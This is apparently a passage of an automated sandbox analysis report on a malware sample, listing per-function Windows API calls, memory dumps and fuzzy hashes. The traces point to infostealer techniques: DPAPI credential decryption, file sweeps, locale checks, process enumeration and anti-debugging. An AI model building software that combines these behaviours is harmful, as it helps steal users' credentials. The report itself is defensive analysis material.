                                              • Part of subcall function 023FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 023FAB6C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                            • String ID:
                                            • API String ID: 1415058207-0
                                            • Opcode ID: 30c097478159a8560779315bb3f44ea3a312a4c7821e37151fb7f80196eac8b7
                                            • Instruction ID: 6266d2615eb7463e120096e9fe10a342a5465b255418e5f0828b275a53d1ac1b
                                            • Opcode Fuzzy Hash: 30c097478159a8560779315bb3f44ea3a312a4c7821e37151fb7f80196eac8b7
                                            • Instruction Fuzzy Hash: 9B12BC719102189BCF69FB60EDA5EEE737AAF54300F4045A9A60E62190EF746F8DCF50
                                            APIs
                                              • Part of subcall function 023FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 023FA9EF
                                              • Part of subcall function 023FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 023FAC2C
                                              • Part of subcall function 023FAC17: lstrcpy.KERNEL32(00000000), ref: 023FAC6B
                                              • Part of subcall function 023FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 023FAC79
                                              • Part of subcall function 023FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 023FAB6C
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,004214C0,00420C2E), ref: 023EE0C5
                                            • StrCmpCA.SHLWAPI(?,004214C8), ref: 023EE115
                                            • StrCmpCA.SHLWAPI(?,004214CC), ref: 023EE12B
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 023EE647
                                            • FindClose.KERNEL32(000000FF), ref: 023EE659
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                            • String ID:
                                            • API String ID: 2325840235-0
                                            • Opcode ID: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                            • Instruction ID: a444bb7dd2f75f0636da0196675c1d3ff5ef9fdf900f098dab08052552ef1dd9
                                            • Opcode Fuzzy Hash: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                            • Instruction Fuzzy Hash: B9F171715142289ACF79FB60EDA4EEE737AAF54300F4041DAA14E621A1EF346F89CF51
                                            APIs
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 00417BE1
                                            • LocalAlloc.KERNEL32(00000040,?), ref: 00417BF9
                                            • GetKeyboardLayoutList.USER32(?,00000000), ref: 00417C0D
                                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417C62
                                            • LocalFree.KERNEL32(00000000), ref: 00417D22
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                            • String ID: /
                                            • API String ID: 3090951853-4001269591
                                            • Opcode ID: 1912af0442f4f1b3bb0e5bffceb408ffebc7a006be0e67e5919f9285ea41dafa
                                            • Instruction ID: 4337a3d4516c1007e731de4e6e4702528bfdb1ea37c67bd3aa396c5a1b158d15
                                            • Opcode Fuzzy Hash: 1912af0442f4f1b3bb0e5bffceb408ffebc7a006be0e67e5919f9285ea41dafa
                                            • Instruction Fuzzy Hash: 6B415E71941118ABDB24DB94DC99FEEB378FF44714F20419AE10962281DB382FC6CFA5
                                            APIs
                                            • memset.MSVCRT ref: 023ECABA
                                            • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 023ECAD8
                                            • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 023ECAE3
                                            • memcpy.MSVCRT(?,?,?), ref: 023ECB79
                                            • lstrcat.KERNEL32(?,00420B46), ref: 023ECBAA
                                            • lstrcat.KERNEL32(?,00420B47), ref: 023ECBBE
                                            • lstrcat.KERNEL32(?,00420B4E), ref: 023ECBDF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                            • String ID:
                                            • API String ID: 1498829745-0
                                            • Opcode ID: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                            • Instruction ID: 2ea193b13d33c23546a824e9aec22820a865847cbf89a9e2d1564050f98f141f
                                            • Opcode Fuzzy Hash: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                            • Instruction Fuzzy Hash: E241627894422AEFDB10DFD0DC88BEEBBB9BB44304F1045A9E50AA6280D7745B84CF95
                                            APIs
                                            • memset.MSVCRT ref: 0040C853
                                            • lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,0079D4F0), ref: 0040C871
                                            • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                            • memcpy.MSVCRT(?,?,?), ref: 0040C912
                                            • lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                            • lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                            • lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                            • String ID:
                                            • API String ID: 1498829745-0
                                            • Opcode ID: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                            • Instruction ID: 73a89fe7b99aa7d2364cb4d3d60341f0774d48a816bcca14cb071eff5a8018ea
                                            • Opcode Fuzzy Hash: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                            • Instruction Fuzzy Hash: 694164B8944219EFDB10DFE4DD89BEEBBB8BB44304F1041A9F509A6280D7745A84CF95
                                            APIs
                                            • GetSystemTime.KERNEL32(0042110C,?,?,00416B11,00000000,?,0079D410,?,0042110C,?,00000000,?), ref: 0041696C
                                            • sscanf.NTDLL ref: 00416999
                                            • SystemTimeToFileTime.KERNEL32(0042110C,00000000,?,?,?,?,?,?,?,?,?,?,?,0079D410,?,0042110C), ref: 004169B2
                                            • SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,0079D410,?,0042110C), ref: 004169C0
                                            • ExitProcess.KERNEL32 ref: 004169DA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Time$System$File$ExitProcesssscanf
                                            • String ID: B
                                            • API String ID: 2533653975-2248957098
                                            • Opcode ID: 985d0f7d058ad0055831b2a8c0dcfb999921c7243e7ebcfc815c5d09d464317a
                                            • Instruction ID: bc3f4e88d18d0d52d27c53656958a280d832632e1993de176dacc6bdaed8f038
                                            • Opcode Fuzzy Hash: 985d0f7d058ad0055831b2a8c0dcfb999921c7243e7ebcfc815c5d09d464317a
                                            • Instruction Fuzzy Hash: A421BAB5D14208AFDF04EFE4D9459EEB7B6FF48300F04852EE506A3250EB349645CB69
                                            APIs
                                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                            • LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                            • LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: BinaryCryptLocalString$AllocFree
                                            • String ID: N@
                                            • API String ID: 4291131564-4229412743
                                            • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                            • Instruction ID: b446a55777cc1d1e4698a5b325ac1ac72e8f4b69ff9cac50ab15cfe2fa8c9284
                                            • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                            • Instruction Fuzzy Hash: 4811A4B4240208BFEB10CFA4DC95FAA77B5FB89714F208059FA159B3D0C776A901CB54
                                            APIs
                                              • Part of subcall function 023FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 023FA9EF
                                            • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 023F7E48
                                            • LocalAlloc.KERNEL32(00000040,?), ref: 023F7E60
                                            • GetKeyboardLayoutList.USER32(?,00000000), ref: 023F7E74
                                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 023F7EC9
                                            • LocalFree.KERNEL32(00000000), ref: 023F7F89
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                            • String ID:
                                            • API String ID: 3090951853-0
                                            • Opcode ID: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                            • Instruction ID: 35e8240eb6af10e995ed6dd5004d16361d0a225420e7ee663df3788461dc69b7
                                            • Opcode Fuzzy Hash: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                            • Instruction Fuzzy Hash: CB414C71950218ABCB64DF94EC98FEDB3B9FB44704F1041D9E209A6290DB742F89CF90
                                            APIs
                                            • IsDebuggerPresent.KERNEL32 ref: 023FBE09
                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 023FBE1E
                                            • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 023FBE29
                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 023FBE45
                                            • TerminateProcess.KERNEL32(00000000), ref: 023FBE4C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                            • String ID:
                                            • API String ID: 2579439406-0
                                            • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                            • Instruction ID: b82bc16217620e6f2f6887e42f783cc4adcb0d009c7ad16df9bd0c75638830cc
                                            • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                            • Instruction Fuzzy Hash: 8921C3BC900205DFDB50DF29F888A967BE4FB0A304F10403AE90987264EBB05981EF49
                                            APIs
                                            • IsDebuggerPresent.KERNEL32 ref: 0041BBA2
                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041BBB7
                                            • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 0041BBC2
                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 0041BBDE
                                            • TerminateProcess.KERNEL32(00000000), ref: 0041BBE5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                            • String ID:
                                            • API String ID: 2579439406-0
                                            • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                            • Instruction ID: 2759986af63cf1bc905e0f8428f5e2b998159022a12c47e0d709fe691c65c3be
                                            • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                            • Instruction Fuzzy Hash: E921A3BC9002059FDB10DF69FD89A963BE4FB0A314F50403AE90A87264DBB45981EF4D
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000008,00000400), ref: 023E74B4
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 023E74BB
                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 023E74E8
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 023E750B
                                            • LocalFree.KERNEL32(?), ref: 023E7515
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                            • String ID:
                                            • API String ID: 2609814428-0
                                            • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                            • Instruction ID: 33ee1695725eeba4565f8639e3488ee5c4dc5f2489de562540ff484f7faa7755
                                            • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                            • Instruction Fuzzy Hash: C0010075A80208BBEB10DFD4DD45F9D77B9EB44704F104155F706AA2C0D670AA00CB65
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90), ref: 0040724D
                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407254
                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00407281
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00407C90,80000001,004161C4), ref: 004072A4
                                            • LocalFree.KERNEL32(?,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 004072AE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                            • String ID:
                                            • API String ID: 3657800372-0
                                            • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                            • Instruction ID: ec186dc502c88c98e3638293fff085d95328f9e4ca1f8ca95b137b7d6c986ae9
                                            • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                            • Instruction Fuzzy Hash: 900100B5A80208BBEB10DFD4DD45F9E77B9EB44704F104159FB05BA2C0D674AA018B66
                                            APIs
                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 023F9885
                                            • Process32First.KERNEL32(00420ACA,00000128), ref: 023F9899
                                            • Process32Next.KERNEL32(00420ACA,00000128), ref: 023F98AE
                                            • StrCmpCA.SHLWAPI(?,00000000), ref: 023F98C3
                                            • CloseHandle.KERNEL32(00420ACA), ref: 023F98E1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                            • String ID:
                                            • API String ID: 420147892-0
                                            • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                            • Instruction ID: 2711a6cac1c1f886151d45b8e28a4aa86fe3b0ff00852c86c76e0377e6ad2160
                                            • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                            • Instruction Fuzzy Hash: EA010C79A50208FFDB60DFE4DD54BEDB7F9EB49700F004189E505A6240D7749A44CF51
                                            APIs
                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041961E
                                            • Process32First.KERNEL32(00420ACA,00000128), ref: 00419632
                                            • Process32Next.KERNEL32(00420ACA,00000128), ref: 00419647
                                            • StrCmpCA.SHLWAPI(?,00000000), ref: 0041965C
                                            • CloseHandle.KERNEL32(00420ACA), ref: 0041967A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                            • String ID:
                                            • API String ID: 420147892-0
                                            • Opcode ID: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                            • Instruction ID: 11d567adce4b572477f284a2ec541547db87c4b6fd8ba8cb36d7f0fd64301d48
                                            • Opcode Fuzzy Hash: efce1fcd99615d94272105280d60a4b92d78062080d1f7b2eb7e6a1284bcad8e
                                            • Instruction Fuzzy Hash: F201E9B9A40208ABCB24DFA5C958BEEB7F9EB49700F104189E90996250D7389F81CF61
                                            APIs
                                              • Part of subcall function 023FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 023FA9EF
                                              • Part of subcall function 023FAB87: lstrcpy.KERNEL32(00000000,?), ref: 023FABD9
                                              • Part of subcall function 023FAB87: lstrcat.KERNEL32(00000000), ref: 023FABE9
                                              • Part of subcall function 023FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 023FAC2C
                                              • Part of subcall function 023FAC17: lstrcpy.KERNEL32(00000000), ref: 023FAC6B
                                              • Part of subcall function 023FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 023FAC79
                                              • Part of subcall function 023FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 023FAB6C
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214F0,00420D73), ref: 023EE709
                                            • StrCmpCA.SHLWAPI(?,004214F8), ref: 023EE759
                                            • StrCmpCA.SHLWAPI(?,004214FC), ref: 023EE76F
                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 023EEE46
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                            • String ID:
                                            • API String ID: 433455689-0
                                            • Opcode ID: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                                            • Instruction ID: f7eca459082f52cc7205d84bb1350e8b5b2e95381a12190556bd9210dc4c8d8b
                                            • Opcode Fuzzy Hash: f3dcec5693a34f3f639a4326c9ab4e832b2dce632252e8eb0e6dc656e0f1fa1e
                                            • Instruction Fuzzy Hash: 4212AA71A102189BCF69FB60EDA5EED737AAF54304F4041A9A60E96190EF346F8CCF51
                                            APIs
                                            • CryptBinaryToStringA.CRYPT32(00000000,023E53EB,40000001,00000000,00000000,?,023E53EB), ref: 023F9127
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: BinaryCryptString
                                            • String ID:
                                            • API String ID: 80407269-0
                                            • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                            • Instruction ID: 1a01c69bdaeee2cf9e685ce61bbdb4c010c227cd7a366b15c975052de328d08f
                                            • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                            • Instruction Fuzzy Hash: 9311EC74204204BFDB44CF94EC89FA733AEAF89754F009568FA0A8B251D775E842DB60
                                            APIs
                                            • CryptBinaryToStringA.CRYPT32(00000000,00405184,40000001,00000000,00000000,?,00405184), ref: 00418EC0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2280583655.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2280583655.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: BinaryCryptString
                                            • String ID:
                                            • API String ID: 80407269-0
                                            • Opcode ID: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                            • Instruction ID: 3c4cb89ba01459054e3b3595e947631781f59a96386c3a2a773972b879479806
                                            • Opcode Fuzzy Hash: 50c587c7d4ac64b069940d35739af35c573ca283b52ef79ebdc7068d03a1f7db
                                            • Instruction Fuzzy Hash: 62111C74200204BFDB00CFA4D884FA733AAAF89304F109549F9198B250DB39EC82DB65
                                            APIs
                                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,023E5155,00000000,00000000), ref: 023E9D56
                                            • LocalAlloc.KERNEL32(00000040,?,?,?,023E5155,00000000,?), ref: 023E9D68
                                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,023E5155,00000000,00000000), ref: 023E9D91
                                            • LocalFree.KERNEL32(?,?,?,?,023E5155,00000000,?), ref: 023E9DA6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: BinaryCryptLocalString$AllocFree
                                            • String ID:
                                            • API String ID: 4291131564-0
                                            • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                            • Instruction ID: 0ecac1a2101c3badf2fd7faba8c8acd989e0d1469510c6a6a15be06f94e8eb0e
                                            • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                            • Instruction Fuzzy Hash: 1A11A4B4240208BFEB10CFA4CC95FAA77B5EB89704F208059FD159B3D0C776A901CB90
                                            APIs
                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 023E9DEB
                                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 023E9E0A
                                            • memcpy.MSVCRT(?,?,?), ref: 023E9E2D
                                            • LocalFree.KERNEL32(?), ref: 023E9E3A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_23e0000_4M3JIACIWk.jbxd
                                            Yara matches
                                            Similarity
